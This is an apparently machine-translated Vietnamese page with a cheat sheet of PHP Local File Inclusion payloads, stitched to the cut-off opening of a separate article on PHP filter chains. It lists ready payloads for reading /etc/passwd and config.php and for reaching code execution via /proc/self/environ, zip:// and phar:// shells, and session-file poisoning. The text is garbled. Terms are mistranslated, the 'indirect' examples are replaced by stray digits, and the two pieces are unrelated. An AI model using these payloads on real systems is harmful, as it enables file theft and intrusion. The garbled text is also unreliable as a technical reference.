Bộ lọc PHP chuyển đổi mã hóa base64 là gì?

Xuất phát từ , Local File Inclusion [LFI] tương tự như lỗ hổng Remote File Inclusion ngoại trừ thay vì bao gồm các tệp từ xa, chỉ bao gồm các tệp cục bộ i. e. các tệp trên máy chủ hiện tại có thể được đưa vào để thực thi

Ví dụ

include $_GET['file'];

hoặc khó hơn,

include $_GET['file'] . ".php";

Thủ thuật

Bao gồm tệp cục bộ trực tiếp

• Đọc các tập tin tùy ý

  • index.php?file=/etc/passwd
  • index.php?file=php://filter/convert.base64-encode/resource=config.php

• Thực thi mã từ xa

  • /proc/self/môi trường

    GET /index.php?file=/proc/self/environ&cmd=id HTTP/1.1
    Host: www.site.com
    User-Agent: 
    

  • Giấy gói Zip và Phar

    • index.php?file=zip://image.zip#shell.php
    • index.php?file=phar://image.phar/shell.php

  • Tệp phiên

    • PHP5 lưu trữ các tệp phiên trong /var/lib/php5/sess_*

      Cookie: PHPSESSID=123php # /var/lib/php5/sess_123php
      index.php?file=/var/lib/php5/sess_123php
      

Bao gồm tệp cục bộ gián tiếp

• Đọc các tập tin tùy ý

  • include $_GET['file'] . ".php";

    0

• Thực thi mã từ xa

  • Giấy gói Zip và Phar

    • include $_GET['file'] . ".php";

      1

    • include $_GET['file'] . ".php";

      2
  • Tệp phiên
    • PHP5 lưu trữ các tệp phiên trong /var/lib/php5/sess_*

      Cookie: PHPSESSID=123php # /var/lib/php5/sess_123php
      index.php?file=/var/lib/php5/sess_123
      

Thẩm quyền giải quyết

2. 通过 zip/phar 协议包含文件
3. Bản ghi Web CTF cuối cùng của AIS3 [Điều kiện chủng tộc & một byte tắt SQL Injection]
4. lucyoa/ctf-wiki

Tìm kiếm các chuỗi tiện ích mới để khai thác các lỗ hổng khử lưu huỳnh có thể rất tẻ nhạt. Trong bài viết này, chúng tôi sẽ giải thích cách kết hợp một kỹ thuật mới được phát hiện gần đây có tên là bộ lọc PHP [LOKNOP-GIST], để chuyển đổi các nguyên hàm bao gồm tệp trong các ứng dụng PHP sang thực thi mã từ xa. Để hỗ trợ giải thích của chúng tôi, chúng tôi sẽ dựa vào chuỗi tiện ích bao gồm tệp Laravel đã được phát hiện trong quá trình nghiên cứu này

Nó bắt đầu như thế nào

Nghiên cứu về chuỗi POP

Tất cả bắt đầu từ nghiên cứu về chuỗi tiện ích để cải thiện kỹ năng phân tích mã trên PHP. Lần đầu tiên chúng tôi bắt đầu với một trong những khuôn khổ yêu thích của tôi. giao hưởng. Thật không may, nhiệm vụ khó hơn dự kiến ​​vì hầu hết các đối tượng có khả năng thú vị đều được bảo vệ bởi cơ chế sau

Vì phương thức